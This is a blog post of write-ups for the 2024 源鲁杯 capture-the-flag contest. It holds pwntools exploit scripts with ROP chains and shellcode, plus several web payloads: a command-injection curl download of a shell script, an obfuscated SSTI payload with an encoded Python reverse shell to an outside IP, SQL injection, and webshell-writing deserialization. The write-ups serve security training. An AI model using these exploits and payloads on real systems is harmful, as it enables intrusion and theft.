首页 > 其他分享 >2024源鲁杯部分wp

2024源鲁杯部分wp

时间:2024-11-20 16:43:22浏览次数:1  
标签:libc elf Round 2024 wp pwn recvuntil payload 源鲁杯

pwn

[Round 1] giaopwn

exp:

# -*- coding: utf-8 -*-
from pwn import *
# from LibcSearcher import *
#p = process("./pwn")
p = remote("challenge.yuanloo.com",24519)
elf = ELF("./pwn")
#libc = ELF("./libc.so.6")
context(arch=elf.arch, os=elf.os,log_level='debug')
#context.terminal = ["tmux", "splitw", "-h"]

vuln=0x4006A1
system=0x4006D2
cat_flag=0x601048
rdi_ret=0x400743
payload='a'*0x28
payload+=p64(rdi_ret)+p64(cat_flag)+p64(system)
# gdb.attach(p,"b *0x4006BF")
# pause()
p.recvuntil("welcome to YLCTF")
p.send(payload)

p.interactive()

[Round 1] ezstack

# -*- coding: utf-8 -*-
from pwn import *
# from LibcSearcher import *
#p = process("./ezstack")
p = remote("challenge.yuanloo.com",41853)
elf = ELF("./ezstack")
#libc = ELF("./libc.so.6")
context(arch=elf.arch, os=elf.os,log_level='debug')
#context.terminal = ["tmux", "splitw", "-h"]

vuln=0x401275
system=0x40134B
ret=0x40101a
payload="/bin/sh\x00"
payload=payload.ljust(0x38,'a')
payload+=p64(ret)+p64(vuln)

# gdb.attach(p,"b *0x40134B")
# pause()
p.recvuntil("good stack")
p.send(payload)

payload="$0"
p.recvuntil("input your command")
p.send(payload)


p.interactive()

[Round 1] ezorw

exp:

# -*- coding: utf-8 -*-
from pwn import *
# from LibcSearcher import *
#p = process("./pwn")
p = remote("challenge.yuanloo.com",24908)
elf = ELF("./pwn")
#libc = ELF("./libc.so.6")
context(arch=elf.arch, os=elf.os,log_level='debug')
#context.terminal = ["tmux", "splitw", "-h"]

shellcode = asm('''
    mov rax, 0x67616c662f2e ;// ./flag
    push rax

    mov rdi, -100
    mov rsi, rsp
    mov rdx, 0
    mov rax, 257 ;// SYS_openat
    syscall

    mov rdi, 1
    mov rsi, 3
    push 0
    mov rdx, rsp
    mov r10, 0x100
    push SYS_sendfile
    pop rax
    syscall

    ''')

p.recvuntil("welcome to YLCTF orw~")
p.send(shellcode)

p.interactive()

[Round 1] ezfmt

exp:

# -*- coding: utf-8 -*-
from pwn import *
# from LibcSearcher import *
#p = process("./pwn")
p = remote("challenge.yuanloo.com",37695)
elf = ELF("./pwn")
libc = ELF("./libc-2.31.so")
context(arch=elf.arch, os=elf.os,log_level='debug')
#context.terminal = ["tmux", "splitw", "-h"]

vuln=0x4010B0
payload='%13$p'
payload=payload.ljust(0x28)+p64(vuln)
p.recvuntil("welcome to YLCTF")
p.send(payload)
p.recvuntil('0x')
libc_base=int(p.recv(12),16)-0x24083
info("libc_base: "+hex(libc_base))

# gdb.attach(p,"b *0x401200")
# pause()

ogg=libc_base+[0xe3afe,0xe3b01,0xe3b04][1]
payload='a'*0x28+p64(ogg)
p.recvuntil("welcome to YLCTF")
p.send(payload)

p.interactive()

[Round 1] canary_orw

exp:

# -*- coding: utf-8 -*-
from pwn import *
# from LibcSearcher import *
#p = process("./pwn")
p = remote("challenge.yuanloo.com",49187)
elf = ELF("./pwn")
libc = ELF("./libc-2.31.so")
context(arch=elf.arch, os=elf.os,log_level='debug')
#context.terminal = ["tmux", "splitw", "-h"]

vuln=0x400820
main=0x400730
ret=0x4006ae
stack_chk=0x601038
pop_rdi=0x400a63
pop_rsi_r15=0x400a61
popp=0x400a5c #pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
jmp_rsp=elf.search(asm('jmp rsp;'),executable=True).next()

payload=p64(vuln)
p.recvuntil("journey\n")
p.send(payload)


payload1='a'*8+p64(stack_chk)
p.recvuntil('Sea\n')
p.send(payload1)

p.recvuntil('magic\n')
p.send(p64(ret))

# gdb.attach(p,"b *0x4008D5")
# pause()

shellcode = asm("""
    mov rax, 0x67616c662f2e
    push rax
    mov rdi, rsp
    xor edx, edx
    xor esi, esi
    push SYS_open
    pop rax
    syscall
  
    push 3
    pop rdi
    push 0xFF   /* read size */
    pop rdx
    mov rsi, rsp
    push SYS_read
    pop rax
    syscall
  
    push 1
    pop rdi
    push 0xFF   /* write size */
    pop rdx
    mov rsi, rsp
    push SYS_write
    pop rax
    syscall
""")

payload3='a'*0x28+p64(jmp_rsp)+shellcode
p.recvuntil('go!\n')
p.send(payload3)


p.interactive()

[Round 1] ezheap(mp)

mp_.tcache_bins基本漏洞利用 - P3troL1er 的个人博客

以上这一通操作能够实现的前提是mp_.tcache_bins通过unsorted bin attack或者large bin attack等方式增大

mp_.tcache_bins = mp_ + 0x50 = mp_ + 80,如果用large bin attack覆写,要写入的地址是mp_ + 0x30。

[Round 2] shortshell

exp:

# -*- coding: utf-8 -*-
from pwn import *
p=remote("challenge.yuanloo.com",44631)
#p = process("./pwn")
elf = ELF("./pwn")
context(arch=elf.arch, os=elf.os, log_level='debug')

buf = 0x404069
backdoor = 0x401270

# gdb.attach(p,"b *0x4011FD")
# pause()

payload = asm('''
sub bl,0x1c
jmp rbx
''')


p.recvuntil("YLCTF-PWN")
p.send(payload)
p.interactive()

[Round 2] ezstack2

exp:

# -*- coding: utf-8 -*-
from pwn import *
from LibcSearcher import *
#p = process("./pwn")
p = remote("challenge.yuanloo.com",34014)
elf = ELF("./pwn")
#libc = ELF("./libc.so.6")
context(arch=elf.arch, os=elf.os,log_level='debug')
#context.terminal = ["tmux", "splitw", "-h"]

# gdb.attach(p,"b *0x40070A")
# pause()
puts_got=0x601018
puts_plt=0x400580
vuln=0x400757
pop_rdi=0x400823
ret=0x40056e
payload='a'*0x38+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(0x40070A)
p.recvuntil("stack")
p.send(payload)
puts=u64(p.recvuntil('\x7F')[-6:].ljust(8,'\x00'))
libc=LibcSearcher("puts",puts)
libc_base=puts-libc.dump("puts")
system=libc_base+libc.dump("system")
bin_sh=libc_base+libc.dump("str_bin_sh")
payload='a'*0x38+p64(ret)+p64(pop_rdi)+p64(bin_sh)+p64(system)
p.recvuntil("stack")
p.send(payload)

p.interactive()

[Round 3] Secret

exp:

# -*- coding: utf-8 -*-
from pwn import *
# from LibcSearcher import *
#p = process("./pwn")
p = remote("challenge.yuanloo.com",32005)
elf = ELF("./pwn")
#libc = ELF("./libc.so.6")
context(arch=elf.arch, os=elf.os,log_level='debug')
#context.terminal = ["tmux", "splitw", "-h"]

payload='SuperSecretPassword\n'
p.sendafter("Enter the secret password: ",payload)

p.interactive()

[Round 3] ezstack3

exp:

# -*- coding: utf-8 -*-
from pwn import *
# from LibcSearcher import *
#p = process("./pwn")
p = remote("challenge.yuanloo.com",49612)
elf = ELF("./pwn")
#libc = ELF("./libc.so.6")
context(arch=elf.arch, os=elf.os,log_level='debug')
#context.terminal = ["tmux", "splitw", "-h"]

leave_ret=0x08049324
system=elf.sym['system']

# gdb.attach(p,'b *0x080492F3\nc')
# pause()
payload='a'*0x30
p.sendafter('Welcome to YLCTF stack3',payload)
p.recvuntil('a'*0x30)
ebp=u32(p.recv(4))
ss=ebp-0x40
binsh=ss+0x10
info("ebp: "+hex(ebp))
payload='aaaa'+p32(system)+p32(0)+p32(binsh)+'/bin/sh'
payload=payload.ljust(0x30,'\x00')
payload+=p32(ss)+p32(leave_ret)
p.send(payload)

p.interactive()

web

[Round 1] Disal

访问 /robots.txt

/flag.php

POST传参

a=1000000aaaaaa&b=1235a

[Round 1] shxpl

换行绕过,多命令执行

123%0acurl%09http://ip:port/1.sh%09-o%091.sh

下载一个shell脚本,里面放上cat /f*,执行脚本

123%0ash%091.sh

[Round 1] Injct

fenjing一把梭,可以命令执行,python反弹shell,payload如下

{%if(((cycler.next|attr(('%c'%95)*2+'globals'+
('%c'%95)*2)|attr(('%c'%95)*2+'getitem'+('%c'%95)*2)(('%c'%95)*2+'builtins'+
('%c'%95)*2)|attr(('%c'%95)*2+'getitem'+('%c'%95)*2)(('%c'%95)*2+'i''mport'+
('%c'%95)*2))('os')|attr('p''open'))
('\\160\\171\\164\\150\\157\\156\\40\\55\\143\\40\\47\\151\\155\\160\\157\\162\\
164\\40\\163\\157\\143\\153\\145\\164\\54\\163\\165\\142\\160\\162\\157\\143\\14
5\\163\\163\\54\\157\\163\\73\\163\\75\\163\\157\\143\\153\\145\\164\\56\\163\\1
57\\143\\153\\145\\164\\50\\163\\157\\143\\153\\145\\164\\56\\101\\106\\137\\111
\\116\\105\\124\\54\\163\\157\\143\\153\\145\\164\\56\\123\\117\\103\\113\\137\\
123\\124\\122\\105\\101\\115\\51\\73\\163\\56\\143\\157\\156\\156\\145\\143\\164
\\50\\50\\42\\64\\67\\56\\61\\62\\61\\56\\61\\62\\63\\56\\71\\66\\42\\54\\62\\65
\\60\\51\\51\\73\\157\\163').read())%}{%endif%}

[Round 1] TOXEC

上传xml

<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee"
	xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
	xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee
						http://xmlns.jcp.org/xml/ns/javaee/web-app_3_1.xsd"
version="3.1">

	<servlet-mapping>
		<servlet-name>default</servlet-name>
		<url-pattern>/</url-pattern>
	</servlet-mapping>

	<servlet-mapping>
		<servlet-name>jsp</servlet-name>
		<url-pattern>*.jsp</url-pattern>
				<url-pattern>*.txt</url-pattern>
				<url-pattern>*.xml</url-pattern>
	</servlet-mapping>
</web-app>

上传shell.txt,然后重命名目录穿越写到root下,再重命名把web.xml写到WEB-INF下,即可把txt解析

成jsp getshell

[Round 1] pExpl

<?php
class FileHandler {
	public $fileHandle="1";
	public $fileName;
}
class Logger {
	public $lastEntry;
	public $logFile="shell.php";
}
class User {
	public $userData;
	public $param="<?=`cat /f*`?>";
	public $data;
}
$a=new FileHandler();
$a->fileName=new User();
$a->fileName->data=array(new Logger(),"info");
echo serialize(array($a,""));

通过log写恶意代码进文件,访问执行拿flag

[Round 1] sInXx

联合注入,利用join绕过逗号,用sys什么什么er的那个表可以查到表名,后面是无列名注入,这里猜的

flag表是2列,利用子查询进行无列名注入拿到flag,payload如下

123123123'/**/UNION/**/SELECT/**/*/**/FROM/**/(SELECT/**/*/**/FROM/**/((SELECT/*
*/5)E/**/JOIN/**/(SELECT/**/1)A/**/JOIN/**/(SELECT/**/2)B/**/JOIN/**/(SELECT/**/
3)C/**/JOIN/**/(SELECT/**/4)D)/**/UNION/**/SELECT/**/*/**/FROM/**/((SELECT/**/1)
A/**/JOIN/**/(SELECT/**/2)B/**/JOIN/**/(SELECT/**/3)D/**/JOIN(SELECT/**/*/**/FRO
M/**/DataSyncFLAG)C))AS/**/A#

[Round 1] FastDB

jdbc反序列化读文件

image-20241120163735427

Reverse

[Round 1] xor

UPX去壳

nc 连上去

# 已知的加密字符
encrypted_hex_values = [
    0x45, 0x50, 0x5f, 0x48, 0x5a, 0x67, 0x7e, 0x2c, 0x24, 0x2f, 0x2b, 0x7d, 0x7d, 0x7f, 0x31, 0x2f,
    0x2b, 0x25, 0x7f, 0x31, 0x28, 0x2d, 0x2b, 0x78, 0x31, 0x7e, 0x25, 0x28, 0x25, 0x31, 0x79, 0x24,
    0x2a, 0x2f, 0x78, 0x2e, 0x2b, 0x7e, 0x7a, 0x7d, 0x2f, 0x2d, 0x61, 0x1c
]


xor_key = 0x1C

decrypted_chars = [chr(value ^ xor_key) for value in encrypted_hex_values]

decrypted_flag = ''.join(decrypted_chars)

print(f"Decrypted FLAG: {decrypted_flag}")
#YLCTF{b0837aac-379c-417d-b949-e863d27bfa31}

[Round 1] ezgo

exp:

encrypted_values = [
    108, 122, 116, 108, 127, 65, 10, 93, 94, 88, 10, 118, 116, 117, 110, 33,
    119, 112, 127, 101, 125, 115, 40, 41, 96, 119, 42, 103, 102, 127, 99, 98,
    54, 51, 51, 105, 96, 107, 104, 108, 100, 58, 34
]


decrypted_flag = ""

for index, encrypted_char in enumerate(encrypted_values):
    decrypted_char = encrypted_char ^ (index + 53)
    decrypted_flag += chr(decrypted_char)

print(f"Decrypted FLAG: {decrypted_flag}")
#YLCTF{1acf5657-e268-49ce-9e77-06ced191309d}

[Round 1]xorplus

exp:

key = "welcometoylctf"
keylen = len(key)
S = list(range(256))
v9 = [ord(key[i % keylen]) for i in range(256)]
v8 = 0
for k in range(256):
    v8 = (v8 + S[k] + v9[k] + 1300) % 256
    S[k], S[v8] = S[v8], S[k]

cipher_bytes = [
    0x91, 0x86, 0x1b, 0x2d, 0x9e, 0x6f, 0x27, 0x2e, 0x78, 0xf3, 0xef, 0xf1,
    0x02, 0x93, 0x22, 0x15, 0x3c, 0xec, 0x5d, 0x2d, 0x80, 0x29, 0x4a, 0x16,
    0x6c, 0x76, 0x4a, 0x53, 0x53, 0x26, 0xb8, 0x95, 0x38, 0x4b, 0x28, 0xc5,
    0xb6, 0x7c, 0x26, 0xf9, 0xb7, 0x34, 0xa6
]

v6 = 0
v7 = 0
plaintext = ''

for i in range(len(cipher_bytes)):
    v6 = (v6 + 1) % 256
    v7 = (v7 + S[v6]) % 256
    S[v6], S[v7] = S[v7], S[v6]
    t = (S[v6] + S[v7]) % 256
    keystream_byte = S[t]
    cipher_byte = cipher_bytes[i]
    plaintext_byte = (cipher_byte - 20) % 256
    p_byte = plaintext_byte ^ keystream_byte
    plaintext += chr(p_byte)

print(plaintext)
#YLCTF{b121fff3-1723-46f3-a891-336c8920e2b0}

Misc

[签到] 打卡小能手

关注 源鲁安全实验室 微信公众号 ,发送 2024YLCTF 即可获得flag。

[Round 1] hide_png

盯着看

[Round 1] pngorzip

zsteg out.png

zsteg -E b1,rgb,lsb,xy out.png > hidden.zip

提取到一个文件夹 里面有flag.txt 需要密码

掩码爆破

密码

114514giao

Crypto

[Round 1] signrsa

exp:

from math import gcd
from Crypto.Util.number import inverse, long_to_bytes

n1 = 18674375108313094928585156581138941368570022222190945461284402673204018075354069827186085851309806592398721628845336840532779579197302984987661547245423180760958022898546496524249201679543421158842103496452861932183144343315925106154322066796612415616342291023962127055311307613898583850177922930685155351380500587263611591893137588708003711296496548004793832636078992866149115453883484010146248683416979269684197112659302912316105354447631916609587360103908746719586185593386794532066034112164661723748874045470225129298518385683561122623859924435600673501186244422907402943929464694448652074412105888867178867357727
n2 = 20071978783607427283823783012022286910630968751671103864055982304683197064862908267206049336732205051588820325894943126769930029619538705149178241710069113634567118672515743206769333625177879492557703359178528342489585156713623530654319500738508146831223487732824835005697932704427046675392714922683584376449203594641540794557871881581407228096642417744611261557101573050163285919971711214856243031354845945564837109657494523902296444463748723639109612438012590084771865377795409000586992732971594598355272609789079147061852664472115395344504822644651957496307894998467309347038349470471900776050769578152203349128951
e = 65537
c = 18186043981640742587831735685230869056429841327227360947626385001427807283361957578241651560174597207750668926022267670343836724867578053461114216055826075585178534403266944658333171445071313079978337446983170242033118195683464152141991719189696843718099978147426803145961427177093551496104187045340099566153999306407628841541835695635098156090786380252846882564002485632325584847521363388800844339219761158626951357694038861754248167814264698304489232076868231291268133060179767629354884625199303019585969602836413525574191125419439606177388294401887882051881718181803494920697338807801036268111770302186752733596353

p = gcd(n1, n2)

if p > 1:
    print("找到公因数 p:", p)
    q1 = n1 // p
    q2 = n2 // p

    phi_n1 = (p - 1) * (q1 - 1)
    phi_n2 = (p - 1) * (q2 - 1)

    d1 = inverse(e, phi_n1)
    d2 = inverse(e, phi_n2)

    # 首先,恢复 c1
    c1 = pow(c, d2, n2)
    m = pow(c1, d1, n1)

    flag = long_to_bytes(m).decode()
    print("Flag为:", flag)
else:
    print("未找到公因数")
#YLCTF{dcfccd2b-e565-4004-9fcc-16a2e3c5d8f7}

[Round 3] ezlcg

python:

from pwn import *
context(os='linux', arch='amd64', log_level='debug')
p = remote('challenge.yuanloo.com', 37437)

def MMI(A, n, s=1, t=0, N=0):
    if n < 2:
        return t % N
    return MMI(n, A % n, t, s - A // n * t, N or n)
def lcg1(a, b, n, c):
    ani = MMI(a, n)
    seed = (ani * (c - b)) % n
    return seed


def lcg2(a, n, c1, c2):
    b = (c2 - a * c1) % n
    ani = MMI(a, n)
    seed = (ani * (c1 - b)) % n
    return seed


def lcg3(n, c1, c2, c3):
    output = [c1, c2, c3]
    a = (output[2] - output[1]) * MMI(output[1] - output[0], n) % n
    ani = MMI(a, n)
    b = (output[1] - a * output[0]) % n
    seed = (ani * (output[0] - b)) % n
    return seed


for _ in range(50):
    p.recvuntil("Challenge one,50 Round\n")
    a = int(p.recvuntil('\n').split(b'=')[1])
    b = int(p.recvuntil('\n').split(b'=')[1])
    n = int(p.recvuntil('\n').split(b'=')[1])
    c = int(p.recvuntil('\n').split(b'=')[1])

    seed = lcg1(a, b, n, c)
    p.sendlineafter('seed =', str(seed))

for _ in range(30):
    p.recvuntil("Challenge two,30 Round\n")
    a = int(p.recvuntil('\n').split(b'=')[1])
    n = int(p.recvuntil('\n').split(b'=')[1])
    c1 = int(p.recvuntil('\n').split(b'=')[1])
    c2 = int(p.recvuntil('\n').split(b'=')[1])

    seed = lcg2(a, n, c1, c2)
    p.sendlineafter('seed =', str(seed))


for _ in range(10):
    p.recvuntil("Challenge three,10 Round\n")
    n = int(p.recvuntil('\n').split(b'=')[1])
    c1 = int(p.recvuntil('\n').split(b'=')[1])
    c2 = int(p.recvuntil('\n').split(b'=')[1])
    c3 = int(p.recvuntil('\n').split(b'=')[1])

    seed = lcg3(n, c1, c2, c3)
    p.sendlineafter('seed =', str(seed))


p.interactive()

[Round 3] repeat

from Crypto.Util.number import *
MSG_PREFIX = b"welcometoYLCTFYL"
MODULUS = 0xba94dc08d76e6f761431a7d34997a6dec45409b61ed1faea119f1121642a62df
en = bytes.fromhex("28e2f5f44c8e22f6026aaac8425d5bf2b1a225987772212bb45eadd0612ca1efa23c7cb1dd9500c0059f8c9a57c349efbc72608db42b0e3255fd99621a9038f14d1b7dd08591a92c07d357b88cfff703cf48fb7940b769d7447b49bb953848dc113c00c5f31d346034585b461157b9a59d0c81936709186b24abe014bbf74810")
C = [en[32*i:32*i+32] for i in range(len(en)//32)]
msg = b""
key = bytes_to_long(C[0]) * inverse(bytes_to_long(MSG_PREFIX[:16])*2024, MODULUS) % MODULUS
for i in range(len(C)):
    msg += long_to_bytes(bytes_to_long(C[i]) * inverse(key*2024,MODULUS) % MODULUS)
    key -= 0x114514
print(msg)
# YLCTFYLCTF{027db262-844f-4d91-849e-6eab6ce0aedf}

标签:libc,elf,Round,2024,wp,pwn,recvuntil,payload,源鲁杯
From: https://www.cnblogs.com/cosyQAQ/p/18558692

相关文章

  • 哋它亢:2024datacon SEO
    哋它亢是一种新兴的技术,它来源于datacon2024的SEO赛题,作为其关键词给出。哋它亢作为一种新时代的朝阳产业,其结合了大数据与人工智能技术,通过添加大量机器学习算法,以实现高效的产出。哋它亢专栏文章列表:哋它亢:datacon2024SEO哋它亢:一种新兴SEO技术的datacon-1哋它亢:一种新......
  • 想要给文件加密?这8款实用的文件加密软件2024办公必备
    在当今信息化的社会中,数据安全越来越受到重视,无论是企业用户还是个人用户,都希望通过加密来保护文件的隐私和安全。以下为您整理了8款实用的文件加密软件,每款工具都功能强大,使用便捷,助您在2024年轻松保障数据安全。1.安秉网盾适合人群:企业用户安秉网盾文件加密是一款高效、......
  • 2024年想要加密文件?常用10款文件加密软件分享|企业办公必备!
    在数字化时代,数据安全是企业运营和个人隐私保护的重要一环。为了有效防止数据泄露,选择一款合适的文件加密软件至关重要。以下是2024年推荐的10款常用文件加密软件,这些软件各具特色,能够满足不同企业和个人的加密需求。1.安秉网盾安秉网盾是一款专注于企业级信息安全管理的工......
  • HZOI NOIP 2024 Round 24 T2 取石子 官方做法
    发现大多数的题解都是不同于官方题解的做法,这里我将介绍官方题解做法。Solution证明先手是否可以必胜的方法相差无几,为了方便后边行文,这里介绍我的思路:考虑各堆石子和为奇数的情况(以下简称为“奇状态”,另一种称为“偶状态”)一定先手必胜:两人一次取一个即可。考虑偶状态。可以发......
  • 2024年icpc南京区域赛随笔
    ​ 其实赛前也没对具体的赛站有什么了解。是教练把我们分配到这个赛站的。学长在赛前就一直在给我们灌输铜牌对于现在的形式来说已经没什么用了,银牌才有点含金量。所以赛前其实是抱着要拿银牌的心态来打这场南京的。​ 提前说一下结果吧:银牌。​ 赛时很快就切出了两道签到,一道字......
  • 2024-11-20模拟赛
    前言:无需多言,8:00~10:00\(4\)小时\(IOI\),ABC198,264C、D、E\(6\)道题。以下顺序按照开题顺序:T1ABC198C-CompassWalking:一眼感觉非常的结论,开始分讨。\(10min\)后过样例了,交,似了;开\(longlong\),交,似了\(2\)个点。(漫长的查错时间)。感觉是精度问题,换成\(double\)......
  • winform,wpf利用Autoupdater.NET.Official实现自动更新,并且利用Setup project部署(母
    Winform部分新建winform/wpf,我这里创建的是winform,程序名UpdateDemo在NuGet安装必备库Autoupdater.NET.Official,我这里安装的版本是1.9.2在页面上写一个label在Form1的构造函数写入代码AutoUpdater.Start("http://172.30.3.158:80/AutoUpdater.xml");这里填写自己的IPpublic......
  • 2024年腾讯云双十一薅羊毛最强攻略:错过一次又得等一年!
    2024年腾讯云双十一活动为用户提供了丰富的云产品和优惠福利,以下是一份省钱、省心、省力的购买攻略,帮助大家制定必抢清单:一、活动时间与入口活动时间:即日起至2024年11月30日23:59:59,具体以页面变更为准。活动入口:腾讯云双十一活动页面二、优惠活动概览1.服务器限时秒杀:每......
  • 2024.11.20 鲜花
    正则表达式核心共振⚡超越一切震慑凡人⚡⚡带来终结机械降神⚡⚡风暴之力充满全身⚡⚡最后一击核心共振⚡就是首先你需要知道一些元字符,也就是它的语法。最基本的几个:^$分别指定行首和行尾。[abc]表示匹配a,b,c中的一个,当然长度不限。也有一些符合人类直觉的写法:[......
  • [2024.11.20]NOIP 模拟赛
    鲜花:今年又在luogu被卡7级线了。赛时T1看见区间操作还以为是贪心+数据结构,然后再看两眼发现这原来是个伪装的多测。对于每一个元素\(m\),相当于要构造一组\(xA+yB=m\)的\((x,y)\)解,这是扩欧。单纯是不行的,题目上要使得\((|x|+|y|)_{min}\)。但是我忘记了扩欧的通解公......

赞助商

阅读排行

网站主页关于我们联系我们网站地图

本网站内容转载自其他媒体,侵权联系[admin##ips99.com]。

Copyright © 2020-2023 IPS99 版权所有 IPS99